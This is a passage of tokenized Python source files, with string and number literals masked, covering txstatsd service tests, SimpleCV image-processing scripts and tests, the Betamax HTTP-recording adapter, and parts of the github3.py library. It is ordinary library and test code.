<s> import tempfile <EOL> try : <EOL> import ConfigParser <EOL> from StringIO import StringIO <EOL> except ImportError : <EOL> import configparser as ConfigParser <EOL> from io import StringIO <EOL> from twisted . trial . unittest import TestCase <EOL> from carbon . client import CarbonClientManager <EOL> from twisted . internet . defer import inlineCallbacks , Deferred <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> from twisted . application . internet import UDPServer <EOL> from txstatsd import service <EOL> from txstatsd . server . processor import MessageProcessor <EOL> from txstatsd . server . protocol import StatsDServerProtocol <EOL> from txstatsd . report import ReportingService <EOL> class GlueOptionsTestCase ( TestCase ) : <EOL> def test_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> o = TestOptions ( ) <EOL> o . parseOptions ( [ ] ) <EOL> self . assertEquals ( "<STR_LIT:default>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_set_parameter ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> o = TestOptions ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_no_config_option ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT>" , "<STR_LIT:c>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> self . assertRaises ( ValueError , lambda : TestOptions ( ) ) <EOL> def get_file_parser ( self , glue_parameters_config = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if glue_parameters_config is None : <EOL> glue_parameters_config = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> f = tempfile . NamedTemporaryFile ( ) <EOL> config = ConfigParser . RawConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> if not kwargs : <EOL> config . set ( '<STR_LIT>' , '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> else : <EOL> for k , v in kwargs . items ( ) : <EOL> config . set ( '<STR_LIT>' , k , v ) <EOL> config . write ( f ) <EOL> f . flush ( ) <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = glue_parameters_config <EOL> def __init__ ( self ) : <EOL> self . config_section = '<STR_LIT>' <EOL> super ( TestOptions , self ) . __init__ ( ) <EOL> return f , TestOptions ( ) <EOL> def test_reads_from_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_cmdline_overrides_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_ensure_config_values_coerced ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( [ [ "<STR_LIT>" , "<STR_LIT:n>" , <NUM_LIT:5> , "<STR_LIT>" , int ] ] , <EOL> number = <NUM_LIT:10> ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name ] ) <EOL> self . assertEquals ( <NUM_LIT:10> , o [ "<STR_LIT>" ] ) <EOL> def test_support_default_not_in_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( [ [ "<STR_LIT>" , "<STR_LIT:n>" , <NUM_LIT:5> , "<STR_LIT>" , int ] ] ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name ] ) <EOL> self . assertEquals ( <NUM_LIT:5> , o [ "<STR_LIT>" ] ) <EOL> def test_support_plugin_sections ( self ) : <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> config_section = "<STR_LIT>" <EOL> o = TestOptions ( ) <EOL> config_file = ConfigParser . RawConfigParser ( ) <EOL> config_file . readfp ( StringIO ( "<STR_LIT>" ) ) <EOL> o . configure ( config_file ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , config_file . items ( "<STR_LIT>" ) ) <EOL> class StatsDOptionsTestCase ( TestCase ) : <EOL> def test_support_multiple_carbon_cache_options ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> config_file = ConfigParser . RawConfigParser ( ) <EOL> config_file . readfp ( StringIO ( "<STR_LIT:\n>" . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) ) ) <EOL> o . configure ( config_file ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT:127.0.0.1>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> class ClientManagerStatsTestCase ( TestCase ) : <EOL> def test_report_client_manager_stats ( self ) : <EOL> """<STR_LIT>""" <EOL> from carbon . instrumentation import stats <EOL> stats [ "<STR_LIT:foo>" ] = <NUM_LIT:0> <EOL> stats [ "<STR_LIT:bar>" ] = <NUM_LIT:1> <EOL> stats [ "<STR_LIT>" ] = <NUM_LIT:2> <EOL> stats [ "<STR_LIT>" ] = <NUM_LIT:3> <EOL> self . assertEquals ( { "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> } , <EOL> service . report_client_manager_stats ( ) ) <EOL> self . assertEquals ( { "<STR_LIT:foo>" : <NUM_LIT:0> , <EOL> "<STR_LIT:bar>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> } , stats ) <EOL> class Agent ( DatagramProtocol ) : <EOL> def __init__ ( self ) : <EOL> self . monitor_response = None <EOL> def datagramReceived ( self , data , host_port ) : <EOL> host , port = host_port <EOL> self . monitor_response = data <EOL> class ServiceTestsBuilder ( TestCase ) : <EOL> def test_service ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> s = service . createService ( o ) <EOL> self . assertTrue ( isinstance ( s , service . MultiService ) ) <EOL> reporting , manager , statsd , udp , httpinfo = s . services <EOL> self . assertTrue ( isinstance ( reporting , ReportingService ) ) <EOL> self . assertTrue ( isinstance ( manager , CarbonClientManager ) ) <EOL> self . assertTrue ( isinstance ( statsd , service . StatsDService ) ) <EOL> self . assertTrue ( isinstance ( udp , UDPServer ) ) <EOL> def test_default_clients ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> s = service . createService ( o ) <EOL> manager = s . services [ <NUM_LIT:1> ] <EOL> self . assertEqual ( sorted ( manager . client_factories . keys ( ) ) , <EOL> [ ( "<STR_LIT:127.0.0.1>" , <NUM_LIT> , None ) ] ) <EOL> def test_multiple_clients ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> o [ "<STR_LIT>" ] = [ "<STR_LIT:127.0.0.1>" , "<STR_LIT>" ] <EOL> o [ "<STR_LIT>" ] = [ <NUM_LIT> , <NUM_LIT> ] <EOL> o [ "<STR_LIT>" ] = [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> s = service . createService ( o ) <EOL> manager = s . services [ <NUM_LIT:1> ] <EOL> self . assertEqual ( sorted ( manager . client_factories . keys ( ) ) , <EOL> [ ( "<STR_LIT:127.0.0.1>" , <NUM_LIT> , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT> , "<STR_LIT:b>" ) ] ) <EOL> def test_carbon_client_options ( self ) : <EOL> """<STR_LIT>""" <EOL> from carbon . conf import settings <EOL> o = service . StatsDOptions ( ) <EOL> o [ "<STR_LIT>" ] = <NUM_LIT> <EOL> o [ "<STR_LIT>" ] = <NUM_LIT> <EOL> service . createService ( o ) <EOL> self . assertEqual ( settings . MAX_QUEUE_SIZE , <NUM_LIT> ) <EOL> self . assertEqual ( settings . MAX_DATAPOINTS_PER_MESSAGE , <NUM_LIT> ) <EOL> def test_monitor_response ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> options = service . StatsDOptions ( ) <EOL> processor = MessageProcessor ( ) <EOL> statsd_server_protocol = StatsDServerProtocol ( <EOL> processor , <EOL> monitor_message = options [ "<STR_LIT>" ] , <EOL> monitor_response = options [ "<STR_LIT>" ] ) <EOL> reactor . listenUDP ( options [ "<STR_LIT>" ] , statsd_server_protocol ) <EOL> agent = Agent ( ) <EOL> reactor . listenUDP ( <NUM_LIT:0> , agent ) <EOL> @ inlineCallbacks <EOL> def exercise ( ) : <EOL> def monitor_send ( ) : <EOL> agent . transport . write ( <EOL> options [ "<STR_LIT>" ] , <EOL> ( "<STR_LIT:127.0.0.1>" , options [ "<STR_LIT>" ] ) ) <EOL> def statsd_response ( result ) : <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , <EOL> agent . monitor_response ) <EOL> yield monitor_send ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( statsd_response ) <EOL> reactor . callLater ( <NUM_LIT> , d . callback , None ) <EOL> try : <EOL> yield d <EOL> except : <EOL> raise <EOL> finally : <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( exercise ) <EOL> reactor . run ( ) </s>
<s> from SimpleCV import * <EOL> from CardUtil import * <EOL> from PlayingCardFactory import * <EOL> import numpy as np <EOL> def GetParallelSets ( line_fs , parallel_thresh = <NUM_LIT> ) : <EOL> result = [ ] <EOL> sz = len ( line_fs ) <EOL> for i in range ( <NUM_LIT:0> , sz ) : <EOL> for j in range ( <NUM_LIT:0> , sz ) : <EOL> if ( j <= i ) : <EOL> result . append ( np . Inf ) <EOL> else : <EOL> result . append ( np . abs ( line_fs [ i ] . cross ( line_fs [ j ] ) ) ) <EOL> result = np . array ( result ) <EOL> result = result . reshape ( sz , sz ) <EOL> l1 , l2 = np . where ( result < parallel_thresh ) <EOL> idxs = zip ( l1 , l2 ) <EOL> retVal = [ ] <EOL> for idx in idxs : <EOL> retVal . append ( ( line_fs [ idx [ <NUM_LIT:0> ] ] , line_fs [ idx [ <NUM_LIT:1> ] ] ) ) <EOL> return retVal <EOL> pcf = PlayingCardFactory ( ) <EOL> data , labels = GetFullDataSet ( ) <EOL> print len ( data ) <EOL> datapoints = zip ( data , labels ) <EOL> datapoints = datapoints [ <NUM_LIT:0> : <NUM_LIT:200> ] <EOL> result = [ ] <EOL> passing = <NUM_LIT:0> <EOL> for d in datapoints : <EOL> img = d [ <NUM_LIT:0> ] <EOL> label = d [ <NUM_LIT:1> ] <EOL> img = img . edges ( ) <EOL> l = img . findLines ( threshold = <NUM_LIT:10> ) <EOL> if ( l is not None ) : <EOL> v = <NUM_LIT> <EOL> h = <NUM_LIT:30> <EOL> vl = l . filter ( np . abs ( l . angle ( ) ) > v ) <EOL> vl = vl . filter ( vl . length ( ) > img . height / <NUM_LIT:6> ) <EOL> hl = l . filter ( np . abs ( l . angle ( ) ) < h ) <EOL> hl = hl . filter ( hl . length ( ) > img . width / <NUM_LIT:8> ) <EOL> vl . draw ( color = Color . RED , width = <NUM_LIT:3> ) <EOL> hl . draw ( color = Color . BLUE , width = <NUM_LIT:3> ) <EOL> img . show ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> from SimpleCV . base import * <EOL> from SimpleCV . Features import Feature , FeatureSet , BlobMaker <EOL> from SimpleCV . ImageClass import Image <EOL> from SimpleCV . Segmentation . SegmentationBase import SegmentationBase <EOL> class DiffSegmentation ( SegmentationBase ) : <EOL> """<STR_LIT>""" <EOL> mError = False <EOL> mLastImg = None <EOL> mCurrImg = None <EOL> mDiffImg = None <EOL> mColorImg = None <EOL> mGrayOnlyMode = True <EOL> mThreshold = <NUM_LIT:10> <EOL> mBlobMaker = None <EOL> def __init__ ( self , grayOnly = False , threshold = ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) ) : <EOL> self . mGrayOnlyMode = grayOnly <EOL> self . mThreshold = threshold <EOL> self . mError = False <EOL> self . mCurrImg = None <EOL> self . mLastImg = None <EOL> self . mDiffImg = None <EOL> self . mColorImg = None <EOL> self . mBlobMaker = BlobMaker ( ) <EOL> def addImage ( self , img ) : <EOL> """<STR_LIT>""" <EOL> if ( img is None ) : <EOL> return <EOL> if ( self . mLastImg == None ) : <EOL> if ( self . mGrayOnlyMode ) : <EOL> self . mLastImg = img . toGray ( ) <EOL> self . mDiffImg = Image ( self . mLastImg . getEmpty ( <NUM_LIT:1> ) ) <EOL> self . mCurrImg = None <EOL> else : <EOL> self . mLastImg = img <EOL> self . mDiffImg = Image ( self . mLastImg . getEmpty ( <NUM_LIT:3> ) ) <EOL> self . mCurrImg = None <EOL> else : <EOL> if ( self . mCurrImg is not None ) : <EOL> self . mLastImg = self . mCurrImg <EOL> if ( self . mGrayOnlyMode ) : <EOL> self . mColorImg = img <EOL> self . mCurrImg = img . toGray ( ) <EOL> else : <EOL> self . mColorImg = img <EOL> self . mCurrImg = img <EOL> cv . AbsDiff ( self . mCurrImg . getBitmap ( ) , self . mLastImg . getBitmap ( ) , self . mDiffImg . getBitmap ( ) ) <EOL> return <EOL> def isReady ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( self . mDiffImg is None ) : <EOL> return False <EOL> else : <EOL> return True <EOL> def isError ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . mError <EOL> def resetError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mError = False <EOL> return <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mCurrImg = None <EOL> self . mLastImg = None <EOL> self . mDiffImg = None <EOL> def getRawImage ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . mDiffImg <EOL> def getSegmentedImage ( self , whiteFG = True ) : <EOL> """<STR_LIT>""" <EOL> retVal = None <EOL> if ( whiteFG ) : <EOL> retVal = self . mDiffImg . binarize ( thresh = self . mThreshold ) <EOL> else : <EOL> retVal = self . mDiffImg . binarize ( thresh = self . mThreshold ) . invert ( ) <EOL> return retVal <EOL> def getSegmentedBlobs ( self ) : <EOL> """<STR_LIT>""" <EOL> retVal = [ ] <EOL> if ( self . mColorImg is not None and self . mDiffImg is not None ) : <EOL> retVal = self . mBlobMaker . extractFromBinary ( self . mDiffImg . binarize ( thresh = self . mThreshold ) , self . mColorImg ) <EOL> return retVal <EOL> def __getstate__ ( self ) : <EOL> mydict = self . __dict__ . copy ( ) <EOL> self . mBlobMaker = None <EOL> del mydict [ '<STR_LIT>' ] <EOL> return mydict <EOL> def __setstate__ ( self , mydict ) : <EOL> self . __dict__ = mydict <EOL> self . mBlobMaker = BlobMaker ( ) </s>
<s> from SimpleCV import * <EOL> import time <EOL> """<STR_LIT>""" <EOL> def identifyGender ( ) : <EOL> f = FaceRecognizer ( ) <EOL> cam = Camera ( ) <EOL> img = cam . getImage ( ) <EOL> cascade = LAUNCH_PATH + "<STR_LIT:/>" + "<STR_LIT>" <EOL> feat = img . findHaarFeatures ( cascade ) <EOL> if feat : <EOL> crop_image = feat . sortArea ( ) [ - <NUM_LIT:1> ] . crop ( ) <EOL> feat . sortArea ( ) [ - <NUM_LIT:1> ] . draw ( ) <EOL> f . load ( LAUNCH_PATH + "<STR_LIT:/>" + "<STR_LIT>" ) <EOL> w , h = f . imageSize <EOL> crop_image = crop_image . resize ( w , h ) <EOL> label , confidence = f . predict ( crop_image ) <EOL> print label <EOL> if label == <NUM_LIT:0> : <EOL> img . drawText ( "<STR_LIT>" , fontsize = <NUM_LIT> ) <EOL> else : <EOL> img . drawText ( "<STR_LIT>" , fontsize = <NUM_LIT> ) <EOL> img . show ( ) <EOL> time . sleep ( <NUM_LIT:4> ) <EOL> identifyGender ( ) </s>
<s> """<STR_LIT>""" <EOL> print __doc__ <EOL> from SimpleCV import * <EOL> import pygame <EOL> import time <EOL> img = Image ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> layer = DrawingLayer ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> layer . setFontSize ( <NUM_LIT> ) <EOL> layer . rectangle ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> ) , Color . WHITE , <NUM_LIT:1> , True ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT> ) , Color . BLACK ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT:50> ) , Color . BLACK ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT> ) , Color . BLACK ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . RED , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . BLUE , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . GREEN , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . YELLOW , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . ORANGE , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . CYAN , <NUM_LIT:1> , True ) <EOL> img . addDrawingLayer ( layer ) <EOL> img = img . applyLayers ( ) <EOL> display = Display ( ) <EOL> img . save ( display ) <EOL> power = <NUM_LIT:1> <EOL> angle = <NUM_LIT:0> <EOL> while not display . isDone ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_UP ] != <NUM_LIT:0> ) : <EOL> power += <NUM_LIT:10> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_DOWN ] != <NUM_LIT:0> ) : <EOL> power = max ( power - <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_LEFT ] != <NUM_LIT:0> ) : <EOL> angle -= <NUM_LIT:5> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_RIGHT ] != <NUM_LIT:0> ) : <EOL> angle += <NUM_LIT:5> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> pass </s>
<s> import os , sys <EOL> from SimpleCV import * <EOL> from nose . tools import with_setup <EOL> testoutput = "<STR_LIT>" <EOL> def test_virtual_camera_constructor ( ) : <EOL> mycam = VirtualCamera ( testoutput , '<STR_LIT:image>' ) <EOL> props = mycam . getAllProperties ( ) <EOL> for i in props . keys ( ) : <EOL> print str ( i ) + "<STR_LIT>" + str ( props [ i ] ) + "<STR_LIT:\n>" <EOL> pass <EOL> def test_camera_image ( ) : <EOL> mycam = Camera ( <NUM_LIT:0> ) <EOL> img = mycam . getImage ( ) <EOL> img . save ( testoutput ) <EOL> pass <EOL> def test_camera_multiple_instances ( ) : <EOL> cam1 = Camera ( ) <EOL> img1 = cam1 . getImage ( ) <EOL> cam2 = Camera ( ) <EOL> img2 = cam2 . getImage ( ) <EOL> if not cam1 or not cam2 or not img1 or not img2 : <EOL> assert False <EOL> cam3 = Camera ( <NUM_LIT:0> ) <EOL> img3 = cam3 . getImage ( ) <EOL> if not cam3 or not img3 : <EOL> assert False <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from . import cassette <EOL> from . exceptions import BetamaxError <EOL> from datetime import datetime , timedelta <EOL> from requests . adapters import BaseAdapter , HTTPAdapter <EOL> _SENTINEL = object ( ) <EOL> class BetamaxAdapter ( BaseAdapter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( BetamaxAdapter , self ) . __init__ ( ) <EOL> self . cassette = None <EOL> self . cassette_name = None <EOL> self . old_adapters = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> self . http_adapter = HTTPAdapter ( ** kwargs ) <EOL> self . serialize = None <EOL> self . options = { } <EOL> def cassette_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cassette_name and os . path . exists ( self . cassette_name ) : <EOL> return True <EOL> return False <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . http_adapter . close ( ) <EOL> def eject_cassette ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cassette : <EOL> self . cassette . eject ( ) <EOL> self . cassette = None <EOL> def load_cassette ( self , cassette_name , serialize , options ) : <EOL> """<STR_LIT>""" <EOL> self . cassette_name = cassette_name <EOL> self . serialize = serialize <EOL> self . options . update ( options . items ( ) ) <EOL> placeholders = self . options . get ( '<STR_LIT>' , { } ) <EOL> cassette_options = { } <EOL> default_options = cassette . Cassette . default_cassette_options <EOL> match_requests_on = self . options . get ( <EOL> '<STR_LIT>' , default_options [ '<STR_LIT>' ] <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( '<STR_LIT>' ) <EOL> for option , value in list ( cassette_options . items ( ) ) : <EOL> if value is None : <EOL> cassette_options . pop ( option ) <EOL> self . cassette = cassette . Cassette ( <EOL> cassette_name , serialize , placeholders = placeholders , <EOL> cassette_library_dir = self . options . get ( '<STR_LIT>' ) , <EOL> ** cassette_options <EOL> ) <EOL> if '<STR_LIT>' in self . options : <EOL> self . cassette . record_mode = self . options [ '<STR_LIT>' ] <EOL> self . cassette . match_options = match_requests_on <EOL> re_record_interval = timedelta . max <EOL> if self . options . get ( '<STR_LIT>' ) : <EOL> re_record_interval = timedelta ( self . options [ '<STR_LIT>' ] ) <EOL> now = datetime . utcnow ( ) <EOL> if re_record_interval < ( now - self . cassette . earliest_recorded_date ) : <EOL> self . cassette . clear ( ) <EOL> def send ( self , request , stream = False , timeout = None , verify = True , <EOL> cert = None , proxies = None ) : <EOL> """<STR_LIT>""" <EOL> interaction = None <EOL> current_cassette = self . cassette <EOL> if not current_cassette : <EOL> raise BetamaxError ( '<STR_LIT>' ) <EOL> if current_cassette . interactions : <EOL> interaction = current_cassette . find_match ( request ) <EOL> if not interaction and current_cassette . is_recording ( ) : <EOL> interaction = self . send_and_record ( <EOL> request , stream , timeout , verify , cert , proxies <EOL> ) <EOL> if not interaction : <EOL> raise BetamaxError ( unhandled_request_message ( request , <EOL> current_cassette ) ) <EOL> resp = interaction . as_response ( ) <EOL> resp . connection = self <EOL> return resp <EOL> def send_and_record ( self , request , stream = False , timeout = None , <EOL> verify = True , cert = None , proxies = None ) : <EOL> """<STR_LIT>""" <EOL> adapter = self . find_adapter ( request . url ) <EOL> response = adapter . send ( <EOL> request , stream = True , timeout = timeout , verify = verify , <EOL> cert = cert , proxies = proxies <EOL> ) <EOL> return self . cassette . save_interaction ( response , request ) <EOL> def find_adapter ( self , url ) : <EOL> """<STR_LIT>""" <EOL> for ( prefix , adapter ) in self . old_adapters . items ( ) : <EOL> if url . lower ( ) . startswith ( prefix ) : <EOL> return adapter <EOL> UNHANDLED_REQUEST_EXCEPTION = """<STR_LIT>""" <EOL> def unhandled_request_message ( request , cassette ) : <EOL> """<STR_LIT>""" <EOL> return UNHANDLED_REQUEST_EXCEPTION . format ( <EOL> url = request . url , cassette_file_path = cassette . cassette_name , <EOL> cassette_record_mode = cassette . record_mode , <EOL> cassette_match_options = cassette . match_options <EOL> ) </s>
<s> from . base import BaseSerializer <EOL> import json <EOL> import os <EOL> class JSONSerializer ( BaseSerializer ) : <EOL> name = '<STR_LIT>' <EOL> @ staticmethod <EOL> def generate_cassette_name ( cassette_library_dir , cassette_name ) : <EOL> return os . path . join ( cassette_library_dir , <EOL> '<STR_LIT>' . format ( cassette_name , '<STR_LIT>' ) ) <EOL> def serialize ( self , cassette_data ) : <EOL> return json . dumps ( cassette_data ) <EOL> def deserialize ( self , cassette_data ) : <EOL> try : <EOL> deserialized_data = json . loads ( cassette_data ) <EOL> except ValueError : <EOL> deserialized_data = { } <EOL> return deserialized_data </s>
<s> from betamax import Betamax <EOL> from tests . integration . helper import IntegrationHelper <EOL> class TestUnicode ( IntegrationHelper ) : <EOL> def test_unicode_is_saved_properly ( self ) : <EOL> s = self . session <EOL> url = '<STR_LIT>' <EOL> with Betamax ( s ) . use_cassette ( '<STR_LIT>' ) as beta : <EOL> self . cassette_path = beta . current_cassette . cassette_path <EOL> s . get ( url ) </s>
<s> """<STR_LIT>""" <EOL> from . __about__ import ( <EOL> __package_name__ , __title__ , __author__ , __author_email__ , <EOL> __license__ , __copyright__ , __version__ , __version_info__ , <EOL> __url__ , <EOL> ) <EOL> from . api import ( <EOL> all_events , <EOL> all_repositories , <EOL> all_users , <EOL> authorize , <EOL> create_gist , <EOL> emojis , <EOL> enterprise_login , <EOL> followed_by , <EOL> followers_of , <EOL> gist , <EOL> gists_by , <EOL> gitignore_template , <EOL> gitignore_templates , <EOL> issue , <EOL> issues_on , <EOL> login , <EOL> markdown , <EOL> octocat , <EOL> organization , <EOL> organizations_with , <EOL> public_gists , <EOL> pull_request , <EOL> rate_limit , <EOL> repositories_by , <EOL> repository , <EOL> search_code , <EOL> search_issues , <EOL> search_repositories , <EOL> search_users , <EOL> starred_by , <EOL> subscriptions_for , <EOL> user , <EOL> zen <EOL> ) <EOL> from . github import GitHub , GitHubEnterprise , GitHubStatus <EOL> from . exceptions import GitHubError <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:user>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from json import dumps <EOL> from . . models import GitHubCore <EOL> from . commit import RepoCommit <EOL> class Branch ( GitHubCore ) : <EOL> """<STR_LIT>""" <EOL> PREVIEW_HEADERS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> def _update_attributes ( self , branch ) : <EOL> self . name = branch . get ( '<STR_LIT:name>' ) <EOL> self . commit = branch . get ( '<STR_LIT>' ) <EOL> if self . commit : <EOL> self . commit = RepoCommit ( self . commit , self ) <EOL> self . links = branch . get ( '<STR_LIT>' , { } ) <EOL> self . protection = branch . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . links : <EOL> self . _api = self . links [ '<STR_LIT>' ] <EOL> else : <EOL> base = self . commit . url . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . _api = self . _build_url ( '<STR_LIT>' , self . name , base_url = base ) <EOL> def _repr ( self ) : <EOL> return '<STR_LIT>' . format ( self . name ) <EOL> def latest_sha ( self , differs_from = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( differs_from ) <EOL> } <EOL> base = self . _api . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] 